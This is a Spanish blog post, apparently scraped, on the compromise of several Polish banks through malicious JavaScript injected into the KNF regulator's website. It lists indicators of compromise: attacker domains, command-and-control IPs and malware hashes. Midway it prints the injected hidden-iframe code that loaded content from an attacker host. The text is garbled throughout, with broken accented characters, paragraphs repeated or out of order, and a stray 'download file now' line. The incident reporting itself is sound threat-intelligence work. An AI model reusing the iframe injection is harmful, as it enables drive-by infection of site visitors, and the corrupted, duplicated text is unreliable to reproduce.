Saturday, September 9, 2017
Hackean varios bancos en Polonia infectándoles a través de un Organismo Financiero Gubernamental
Hackean varios bancos en Polonia infectándoles a través de un Organismo Financiero Gubernamental
Esta semana ha saltado a la primera plana internacional el que ya est� considerado como el mayor incidente de Ciberseguridad en la historia de Polonia: varios bancos del pa�s han sido v�ctimas de un Malware y la fuente de la infecci�n fue la Autoridad de Supervisi�n Financiera de Polonia (KNF), organismo oficial encargado precisamente de garantizar la seguridad en el sector financiero.Por el momento se desconoce el n�mero total de bancos afectados aunque se teoriza sobre unas 20 entidades distintas y se ha reportado la infecci�n tanto de estaciones de trabajo como de servidores en varias instituciones bancarias de Polonia. Solamente se ha confirmado la exfiltraci�n de datos e informaci�n confidencial y se ha descartado el robo de dinero o manipulaci�n de cuentas bancarias, aunque el tr�fico detectado conten�a gran cantidad de datos cifrados por lo que es imposible discernir de momento el contenido.
La informaci�n es a d�a de hoy escasa y difusa, ya que est� siendo controlada con cuentagotas para mitigar el posible p�nico que pudiera desencadenar entre usuarios y clientes.
La informaci�n es a d�a de hoy escasa y difusa, ya que est� siendo controlada con cuentagotas para mitigar el posible p�nico que pudiera desencadenar entre usuarios y clientes.
El detonante de la investigaci�n fue la detecci�n de tr�fico inusual a localizaciones ex�ticas y el hallazgo de ciertos ejecutables cifrados en servidores de varias entidades, quienes al cotejar los resultados de sus an�lisis y las IOC dieron la voz de alarma.
V�a de Entrada
Las primeras investigaciones se�alan que el punto de partida de la infecci�n fue el servidor web del regulador financiero polaco antes mencionado, KNF: www.knf.gov.pl
Dicha web ha permanecido ca�da durante los �ltimos d�as y hoy durante toda la jornada �nicamente ha sido accesible desde Polonia y ha estado bloqueando por geolocalizaci�n toda conexi�n externa.
![]() |
| Mensaje de error en la web del KNF |
![]() |
| Bloqueo por geolocalizaci�n de la web del KNF: conexi�n desde fuera y dentro de Polonia |
El art�culo de BadCyber escrito por varios analistas que han tenido acceso privilegiado a la investigaci�n relata que el c�digo de una librer�a Javascript de dicho servidor habr�a sido alterado para cargar un fichero Javascript o JSP externo alojado en un servidor remoto, aunque se desconoce c�mo se habr�a logrado en primera instancia dicha modificaci�n inicial.
El c�digo malicioso inyectado estaba localizado en el fichero:
hxxp://www.knf.gov.pl/DefaultDesign/Layouts/KNF2013/resources/accordian-src.js?ver=11Y consist�a en las siguiente l�neas:
Dicho fragmento de Javascript var�a de unas versiones a otras en cuanto a la URL y el fichero que carga. A continuaci�n una lista de todos posibles dominios maliciosos encontrados y relacionados con el ataque:
document.write("<div id=efHpTk width=0px height=0px><iframe
name=forma src=hxxps://sap.misapor.ch/vishop/view.jsp?pagenum=1
width=145px height=146px style=left:-2144px;position:absolute;top:0px;
></iframe></div>");
Dicho fragmento de Javascript var�a de unas versiones a otras en cuanto a la URL y el fichero que carga. A continuaci�n una lista de todos posibles dominios maliciosos encontrados y relacionados con el ataque:
- sap.misapor.ch
- www.eye-watch.in
- ocmlaptops.co.uk
- ournepal.com
- impacthomes-my.sharepoint.com
- pharmacareaus-my.sharepoint.com
- cpsnortherngroup.com
- Polakwchinach.pl
Se desconoce el contenido de dichos ficheros Javascript/JSP ya que los recursos parecen no estar disponibles y los servidores devuelven un HTTP 404 o un HTTP 202 con un archivo sin contenido.
Se cree firmemente que descargaba un fichero en el equipo de la v�ctima el cual al ser ejecutado realizaba conexiones con varios servidores controlados por los atacantes permiti�ndoles funcionalidades como tomar el control del equipo y propagarse por la red interna.
Servidor C&C
En los logs analizados de equipos infectados se han detectado conexiones a dos IPs distintas:
- 125.214.195.17
- 196.29.166.218



![]() |
| Fuente de las im�genes: https://twitter.com/v0id_hunter/status/828693925057675265 |
Malware
Aun no est� clara la autor�a de estos ataques, pero los an�lisis forenses pertinentes dejan entrever que el problema se remonta a mediados de 2016, lo que significa que los bancos han sido v�ctimas del espionaje durante m�s de 6 meses.
El malware utilizado en Polonia usa packers comerciales y m�ltiple ofuscadores, recurre al cifrado de ficheros y tr�fico, y en el momento de los an�lisis ning�n Antivirus era capaz de detectarlo. El payload final ten�a las funcionalidades de un RAT com�n.
Ciertos analistas destacan como posible candidato a relacionar con dicho malware a una APT bautizada como "Bluenoroff" que fue detectada en 2016 y cuya incidencia se ha disparado en los �ltimos meses.
Ciertos analistas destacan como posible candidato a relacionar con dicho malware a una APT bautizada como "Bluenoroff" que fue detectada en 2016 y cuya incidencia se ha disparado en los �ltimos meses.
El siguiente informe de Telef�nica del pasado noviembre habla sobre dicha APT bas�ndose en an�lisis realizados por Karspersky sobre una muestra obtenida de un ataque al Banco de Indonesia. Seg�n el citado documento, "Bluenoroff" fue el malware utilizado en los ataques contra el sistema SWIFT en Bangladesh, Indonesia, India y otros pa�ses del sudeste asi�tico, y presenta similitudes con otro usado previamente en ataques contra bancos en Vietnam.
A la espera de nuevos avances en las investigaciones, de momento s�lo se han compartido los hashes de algunas de las muestras analizadas:
MD5
C1364BBF63B3617B25B58209E4529D8C
85D316590EDFB4212049C4490DB08C4B
1BFBC0C9E0D9CEB5C3F4F6CED6BCFEAE
SHA1
496207DB444203A6A9C02A32AFF28D563999736C
4F0D7A33D23D53C0EB8B34D102CDD660FC5323A2
BEDCEAFA2109139C793CB158CEC9FA48F980FF2BSHA256
FC8607C155617E09D540C5030EABAD9A9512F656F16B38682FD50B2007583E9B
D4616F9706403A0D5A2F9A8726230A4693E4C95C58DF5C753CCC684F1D3542E2
CC6A731E9DAFF84BAE4214603E1C3BAD8D6735B0CBB2A0EC1635B36E6A38CB3A
Fuentes:
https://zaufanatrzeciastrona.pl/post/wlamania-do-kilku-bankow-skutkiem-powaznego-ataku-na-polski-sektor-finansowy/
https://badcyber.com/several-polish-banks-hacked-information-stolen-by-unknown-attackers/
https://twitter.com/v0id_hunter/status/828693925057675265
http://thehackernews.com/2017/02/bank-hacking-malware.html
https://www.elevenpaths.com/wp-content/uploads/2016/11/Financial_Threats_Q3-2016_EN.pdf
download file now
Labels:
a,
bancos,
de,
en,
financiero,
gubernamental,
hackean,
infect�ndoles,
organismo,
polonia,
trav�s,
un,
varios


